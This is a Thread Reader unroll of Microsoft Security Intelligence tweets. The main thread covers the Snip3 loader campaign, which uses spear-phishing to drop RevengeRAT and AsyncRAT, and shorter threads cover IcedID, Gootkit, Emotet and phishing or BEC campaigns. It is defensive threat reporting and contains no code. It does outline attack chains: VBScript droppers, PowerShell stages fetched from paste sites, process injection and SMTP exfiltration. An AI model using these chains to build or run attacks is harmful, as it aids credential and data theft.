Share this page!

Microsoft Security Intelligence Profile picture
Twitter logo
11 May, 7 tweets, 3 min read
In the past few months, Microsoft has been tracking a dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT.
Attackers use the remote access Trojans for data theft, follow-on activity, and additional payloads, including Agent Tesla, which they use for data exfiltration. The loader is under active development and is dubbed Snip3 by Morphisec. blog.morphisec.com/revealing-the-…
The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.
The RATs connect to a C2 server on hosted on a dynamic hosting site to register with the attackers, and then uses a UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites.
The Trojans continuously re-run components until they are able to inject into processes like RegAsm, InstallUtil, or RevSvcs. They steal credentials, screenshots and webcam data, browser and clipboard data, system and network into, and exfiltrates data often via SMTP Port 587.
Microsoft 365 Defender detects the multiple components of this attack. Our researchers are closely monitoring the campaign and will share additional info and investigation guidance through Microsoft 365 security center and Microsoft Threat Experts.
If your org is in the targeted sectors, we recommend validating that you're not affected. We published advanced hunting queries that you can use to locate relevant or similar activities, emails, implants, and other indicators of attack in your environment: aka.ms/Snip3LoaderCam…

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Microsoft Security Intelligence

Microsoft Security Intelligence Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @MsftSecIntel

Microsoft Security Intelligence Profile picture
13 Apr
The recent surge of IcedID campaigns indicate that this malware family is likely being used to fill in some of the void left by recent malware infrastructure disruptions. We are tracking multiple active IcedID campaigns of various sizes, delivery methods, and targets.
As we recently published, an IcedID campaign abuses contact forms to deliver malicious links via legitimate emails. The malicious links point to IcedID, which downloads a Cobalt Strike implant that allows attackers to perform hands-on-keyboard activities: microsoft.com/security/blog/…
Another campaign delivers IcedID via malicious Excel 4.0 (XLM) macros in spreadsheets within ZIP files attached to COVID-19 and other health-themed emails. AMSI drives behavior-based detection of malicious XLM macros: microsoft.com/security/blog/…
Read 7 tweets
Microsoft Security Intelligence Profile picture
22 Mar
Phishers continue to find success in using compromised accounts on email marketing services to send malicious emails from legitimate IP ranges and domains. They take advantage of configuration settings that ensure delivery of emails even when the email solution detects phishing.
This is the case for the Compact phishing operation, which was disclosed by WMC Global. The campaign was observed using compromised accounts on SendGrid in late 2020. wmcglobal.com/blog/the-compa…
Microsoft Defender for Office 365 data shows that this phishing operation is still active today and continues to expand. In addition to SendGrid, the attackers also used Amazon SES last year. Since January, they have been using Mailgun. We have shared our research with Mailgun.
Read 7 tweets
Microsoft Security Intelligence Profile picture
2 Mar
We're seeing numerous extensive hands-on-keyboard attacks emanating from the Gootkit malware, which is distributed via drive-by downloads as a JavaScript within a ZIP file. The JavaScript is launched via WScript and establishes C2, enabling attackers to take control of devices.
The attacks use blog posts with malicious links pointing to the Gootkit malware. Attackers publish these blog posts on legitimate websites they have compromised. Users are directed to the malicious blog hosts via search engine optimization.
The blogs usually have subjects relating to contracts, canceling services, agreements, and tenancy. These attacks have been observed to primarily target devices in Germany, though multiple other geolocations are targeted as well.
Read 6 tweets
Microsoft Security Intelligence Profile picture
24 Feb
We’re tracking a rampant phishing attack that uses DGA domains, free email services, and even compromised email accounts to send massive numbers of phishing emails. These emails are linked by open redirector URLs that begin with a distinct pattern: hxxps://t[.]domain[.]tld/r/? ImageImage
The phishing emails pose as notifications from various productivity tools. The use of open redirect is both a detection evasion technique and a way to trick users into clicking the redirector URLs, which show a legitimate domain followed by a redirect to the phishing link.
Microsoft Defender for Office 365 detects this campaign. We’re sharing this info for the broader community & for customers to review mail flow rules, e.g. those related to IP ranges or domain-level allow lists, to ensure phishing emails don’t slip through docs.microsoft.com/en-us/exchange…
Read 4 tweets
Microsoft Security Intelligence Profile picture
8 Feb
Microsoft 365 Defender data shows that the disruption of Emotet infrastructure immediately resulted in the drop in new campaigns. Given Emotet’s reach and role in the deployment of payloads like ransomware, however, customers should ensure continued monitoring and protection.
Just before the takedown, Emotet was very active, launching massive campaigns every week after coming out of a hiatus in late December. The most recent campaigns used the usual document attachments malicious macros that ran a PowerShell script to download a DLL payload.
The use of DLL payload (instead of EXE) is one of updates Emotet introduced in December. These updates, which also included the use of 7 download URLs (up from 5) and binary format for C2 communication (replacing text), show Emotet was actively evolving before being disrupted.
Read 5 tweets
Microsoft Security Intelligence Profile picture
2 Feb
We detected a recent spike in busines email compromise (BEC) attacks soliciting gift cards primarily targeting K-12 schoolteachers. Attackers impersonate colleagues or school officials to ask recipients to purchase various gift cards.
The fraudulent emails are sent from attacker-created accounts on free email service providers, such as Gmail, Mail[.]ru, Yahoo, Hotmail, Outlook, and iCloud. As in many BEC campaigns, attackers identify targets through their publicly available info on websites and social media.
Attackers use various scenarios and lures to feign legitimacy and urgency. Based on intelligence, these attackers have also used COVID-19 lures for similar gift card BEC campaigns.
Read 4 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!

Like this author's thread?

Get emails when @MsftSecIntel has new unrolls!

Check out other threads from @MsftSecIntel!

Read all threads by @MsftSecIntel

:(